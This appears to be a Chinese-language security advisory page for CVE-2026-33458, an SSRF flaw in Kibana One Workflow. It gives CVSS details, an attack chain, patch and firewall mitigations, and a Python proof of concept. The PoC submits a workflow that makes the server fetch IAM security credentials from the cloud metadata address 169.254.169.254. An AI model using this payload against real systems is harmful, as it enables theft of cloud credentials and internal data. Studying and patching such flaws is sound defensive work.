CVE-2026-33458 CVSS 6.3 中危

CVE-2026-33458 Kibana One Workflow SSRF漏洞

披露日期: 2026-04-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33458

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Elastic Kibana

漏洞概述

CVE-2026-33458是Elastic Kibana One Workflow组件中发现的服务器端请求伪造（SSRF）漏洞。由于工作流执行引擎未能正确验证主机允许列表，拥有工作流创建和执行权限的经过身份验证的用户可以利用此漏洞绕过安全限制。攻击者可通过构造恶意工作流请求，访问内部敏感端点，导致敏感信息泄露，对系统机密性构成严重威胁。

技术细节

该漏洞源于Kibana One Workflow的工作流执行引擎在处理用户定义的HTTP请求时，对目标主机的验证逻辑存在缺陷。尽管系统配置了允许列表机制以限制可访问的外部或内部地址，但攻击者可以通过构造特定的请求绕过这一检查。漏洞利用条件为需要具备低权限（PR:L）的认证账户，且无需用户交互（UI:N）。攻击者通过网络向量（AV:N）提交恶意工作流，利用成功后将导致范围变更（S:C），可能影响同一安全域内的其他组件。虽然该漏洞不影响系统的完整性和可用性，但由于允许探测并访问内网敏感资源（如元数据服务），机密性影响为高（C:H）。

攻击链分析

STEP 1

步骤1：获取认证

攻击者获取一个拥有工作流创建和执行权限的低权限Kibana账户。

STEP 2

步骤2：构造恶意工作流

攻击者创建一个新的工作流，在其中配置一个HTTP请求动作，目标指向内网敏感地址（如127.0.0.1或云元数据服务）。

STEP 3

步骤3：绕过允许列表

提交并执行该工作流。由于存在漏洞，执行引擎未能拦截该请求，允许Kibana服务器代表攻击者向内网发起请求。

STEP 4

步骤4：获取敏感信息

攻击者从工作流的执行结果中获取内网服务的响应数据，造成信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2026-33458
# Conceptual PoC demonstrating the SSRF bypass in Kibana One Workflow

import requests
import json

TARGET_URL = "https://<kibana-host>:<port>/api/workflows/execute"
HEADERS = {
    "Content-Type": "application/json",
    "kbn-xsrf": "reporting"
}
AUTH = ("low_priv_user", "password")

# Payload attempting to access internal metadata service
payload = {
    "workflow": {
        "name": "SSRF_PoC",
        "steps": [
            {
                "action": "http_request",
                "params": {
                    "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
                    "method": "GET"
                }
            }
        ]
    }
}

try:
    response = requests.post(TARGET_URL, headers=HEADERS, auth=AUTH, json=payload, verify=False)
    if response.status_code == 200:
        print("[+] Potential SSRF triggered. Response:")
        print(response.text)
    else:
        print(f"[-] Request failed with status {response.status_code}")
except Exception as e:
    print(f"Error: {e}")

影响范围

Kibana < 9.3.3

防御指南

临时缓解措施

建议立即应用官方补丁进行修复。若无法立即升级，应暂时禁用Kibana的One Workflow功能，或严格限制工作流权限。同时，配置防火墙规则阻断Kibana服务器访问内网非必要端口及云元数据服务地址（如169.254.169.254）。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表